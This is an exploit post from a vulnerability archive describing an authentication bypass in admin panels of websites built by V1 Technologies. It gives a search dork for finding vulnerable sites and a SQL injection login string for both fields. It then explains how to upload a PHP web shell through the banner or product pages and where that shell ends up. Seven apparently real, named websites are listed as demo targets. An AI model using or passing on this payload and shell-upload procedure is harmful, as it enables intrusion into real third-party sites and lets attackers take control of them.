v1technologies admin page bypass vulnerability

2018.09.15
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-592

#################################### # Exploit Title: v1technologies admin page bypass vulnerability # Date: 2018-09-15 # Vendor Homepage: https://www.v1technologies.com/ # Exploit Author: nothing404.team # Google Dork: intext:"Mobile Friendly Web Design By: V1 Technologies Ltd" # Tested on: Kali Linux #################################### admin page: site.com/Site-Admin-V1/ exploit: Username: '=''or' password: '=''or' Demo: http://globalelec.co.in/Site-Admin-V1/ http://www.englishcountrybarn.co.uk/Site-Admin-V1/ http://excellous.biz//Site-Admin-V1/ http://www.indiaelec.com.sg/Site-Admin-V1/ https://www.sportspathwaycoaching.com//Site-Admin-V1/ http://progressivefootballacademy.com/Site-Admin-V1/ http://bossevents.co.in/Site-Admin-V1/ after login go to home -> Banner or Manage Products -> now you can uplaod shell shell Path --> site.com/images/banner/yourshell.php #################################### # ! We Are Nothing ! # nothing404.team@gmail.com ####################################


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top